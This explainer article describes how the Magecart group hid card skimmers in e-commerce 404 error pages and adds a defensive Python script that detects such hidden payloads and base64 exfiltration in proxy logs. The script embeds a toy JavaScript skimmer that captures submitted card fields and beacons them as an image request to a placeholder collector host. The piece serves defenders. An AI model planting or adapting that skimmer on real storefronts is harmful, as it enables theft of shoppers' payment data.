Magecart, a notorious group of cybercriminals known for stealing payment data from e-commerce websites, has been caught using a scheme that abuses a seemingly harmless element of the web: the 404 error page. This tactic, discovered by the Akamai Security Intelligence Group, is one of three variants employed by Magecart, and it involves hiding malicious code within 404 error pages to skim customers' credit card information surreptitiously.
How did 404 pages become a cybercriminal’s playground?
In this cyberattack orchestrated by the Magecart group, hackers manipulate a website’s 404 error page—the page displayed when a webpage doesn’t exist or has a broken link. They hide malicious code within this seemingly innocuous page to steal credit card information from unsuspecting visitors. The concealed code presents a fake form to users, prompting them to enter sensitive credit card details. This stolen data is then covertly transmitted to the hackers, disguised as innocent image requests. The innovative approach makes detection challenging, emphasizing the need for robust cybersecurity measures to protect online transactions and user information.
Let’s delve into the details of how this Magecart card-skimming hack, which exploits 404 error pages, actually works:
- Target selection: The first step for Magecart hackers is to identify their targets, which primarily include e-commerce websites built on popular platforms like Magento and WooCommerce. Some victims of this campaign have been prominent organizations in the food and retail sectors.
- Concealment of malicious code: Once a target is chosen, the hackers employ an innovative technique. They manipulate the website’s 404 error page, which is the page visitors see when they try to access a webpage that doesn’t exist, has been moved, or contains a dead link.
- Hiding in plain sight: Rather than embedding the skimmer directly in the checkout page's scripts, the Magecart actors stash it inside the 404 error page. The technique had not been seen in previous Magecart campaigns, which gives them a new way to evade detection.
- The skimmer loader: The skimmer loader is a critical component of the attack. It can take on various disguises, such as appearing as a Meta Pixel code snippet or hiding within pre-existing inline scripts on the compromised checkout webpage.
- Fetching non-existent resources: The loader issues a fetch request to a relative path named 'icons'. This path does not exist on the targeted website, so the request returns a "404 Not Found" error. At first glance, it looks like an innocent mistake or an inactive skimmer.
- Cloaked in HTML comments: On closer inspection, however, the loader contains a regular expression match that searches for a specific string within the HTML of the 404 error page. Once it finds this string, it extracts a concatenated base64-encoded string concealed inside an HTML comment.
- Malicious JavaScript unveiled: This base64-encoded string, when decoded, reveals the JavaScript skimmer, which is designed to remain hidden on all 404 error pages.
- The fake payment form: With the skimmer active, it presents a fake form to website visitors. This deceptive form prompts users to input sensitive information, including their credit card number, expiration date, and security code. Unbeknownst to the victim, the moment they submit this data they are shown a fake "session timeout" error.
- Data exfiltration: In the background, all the stolen information is base64-encoded and sent to the attacker via an image request URL, carrying the string as a query parameter. This deceptive approach masks the data exfiltration as a seemingly harmless image fetch event, making it challenging for network traffic monitoring tools to identify.
- Stolen information: However, upon decoding the base64 string, the attacker gains access to personal and credit card information, potentially leading to identity theft and financial loss for the victims.
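Two of the steps above leave artefacts a defender can check for: the skimmer body sitting as base64 inside an HTML comment of the page the server actually returns for a missing path, and the exfiltration leaving as an image request whose query string is a base64 blob that decodes to card data. The script below is an added example written for this article, not code from Akamai's report, and it does not reproduce the campaign's actual marker string, paths or collector domain. The 404 page, the marker string `EXAMPLE_MARKER`, the toy skimmer, the egress-proxy log lines and the collector hostname are all constructed for the example; the card number is the publicly documented Visa test number. It handles a payload stored as one contiguous base64 run; a loader that reassembles several fragments would need its concatenation logic mirrored.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, quote, urlsplit

# --- Constructed sample data (not from any real incident) -------------------
# A toy skimmer: hooks form submission and beacons the data as an image request.
SKIMMER_JS = (
    "document.addEventListener('submit',function(e){"
    "var d=btoa(JSON.stringify({cc:e.target.cc.value}));"
    "new Image().src='https://collector.example.invalid/p.gif?d='+d;});"
)
# A 404 page with the payload hidden in an HTML comment behind a marker string
# (EXAMPLE_MARKER is a placeholder for this example, not the campaign's string).
SAMPLE_404_HTML = (
    "<!DOCTYPE html><html><head><title>404 Not Found</title></head><body>"
    "<h1>Page not found</h1><!-- generated by the storefront -->"
    "<!-- EXAMPLE_MARKER " + base64.b64encode(SKIMMER_JS.encode()).decode() + " -->"
    "</body></html>"
)
# Egress-proxy log lines in common log format. 4111111111111111 is the public
# Visa test number; the payload is URL-encoded as a browser would send it.
EXFIL_JSON = '{"cc":"4111111111111111","exp":"12/26","cvv":"123"}'
EXFIL_B64 = quote(base64.b64encode(EXFIL_JSON.encode()).decode(), safe="")
SAMPLE_PROXY_LOG = [
    '10.0.0.12 - - [10/Oct/2023:12:00:01 +0000] "GET https://shop.example/static/logo.png HTTP/1.1" 200 5120',
    '10.0.0.12 - - [10/Oct/2023:12:00:05 +0000] "GET https://shop.example/icons HTTP/1.1" 404 1180',
    '10.0.0.12 - - [10/Oct/2023:12:01:30 +0000] "GET https://collector.example.invalid/p.gif?d='
    + EXFIL_B64 + ' HTTP/1.1" 200 43',
    '10.0.0.31 - - [10/Oct/2023:12:02:00 +0000] "GET https://shop.example/img/pixel.gif?v=3 HTTP/1.1" 200 43',
]

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.S)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
IMAGE_EXTS = (".gif", ".png", ".jpg", ".jpeg", ".webp", ".svg")
JS_INDICATORS = ("document.", "function", "addEventListener", "new Image",
                 "XMLHttpRequest", "fetch(", "btoa(", "location", "querySelector")
CARD_RE = re.compile(r"(?<!\d)\d{13,19}(?!\d)")


def _try_decode(b64: str):
    """Strictly decode base64 to text; None if not valid base64 or not UTF-8."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def luhn_valid(digits: str) -> bool:
    """Luhn checksum: separates card-like digit runs from order ids or timestamps."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def find_hidden_scripts(html: str, min_len: int = 40):
    """Return (comment_prefix, decoded_script) for each HTML comment carrying a
    base64 run that decodes to JavaScript-like text. Feed it the body the server
    returns for a non-existent path, not the template on disk."""
    run_re = re.compile(r"[A-Za-z0-9+/]{%d,}={0,2}" % min_len)
    findings = []
    for m in COMMENT_RE.finditer(html):
        body = m.group(1)
        for run in run_re.findall(body):
            decoded = _try_decode(run)
            if decoded and sum(kw in decoded for kw in JS_INDICATORS) >= 2:
                findings.append((body.strip()[:30], decoded))
    return findings


def find_suspicious_image_requests(log_lines, min_len: int = 64):
    """Flag image requests whose query parameter is a base64 blob, noting whether
    the decoded blob contains a Luhn-valid card-like number."""
    flagged = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith(IMAGE_EXTS):
            continue
        for name, values in parse_qs(url.query).items():
            for value in values:
                # parse_qs turns an unescaped '+' into a space; restore it for base64
                value = value.replace(" ", "+")
                decoded = _try_decode(value)
                if decoded is None:
                    continue
                if any(luhn_valid(n) for n in CARD_RE.findall(decoded)):
                    reason = "card-like number in decoded payload"
                elif len(value) >= min_len:
                    reason = "long base64 payload on an image request"
                else:
                    continue
                flagged.append({"url": m.group(1), "param": name, "reason": reason})
    return flagged


if __name__ == "__main__":
    for prefix, script in find_hidden_scripts(SAMPLE_404_HTML):
        print("hidden script behind comment %r:\n  %s" % (prefix, script))
    for hit in find_suspicious_image_requests(SAMPLE_PROXY_LOG):
        print("suspicious: %(reason)s (param %(param)s) %(url)s" % hit)
```

The first check belongs in a periodic integrity job that requests a deliberately bogus path on the live storefront and diffs the returned body against the deployed 404 template; the second belongs on egress-proxy or browser-telemetry data, since the beacon goes to the attacker's host and never appears in the shop's own access log. A Content-Security-Policy that restricts `img-src` would stop the beacon outright and surface the attempt as a violation report.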
This sophisticated attack highlights the evolving tactics of Magecart hackers, who continuously find new ways to conceal their malicious code and compromise the security of online stores. It underscores the need for heightened vigilance in safeguarding sensitive information and the imperative for robust cybersecurity measures to protect both businesses and consumers in an increasingly digital world.
For more detailed information, read the Akamai Security Intelligence Group's report.
Featured image credit: Erik Mclean/Unsplash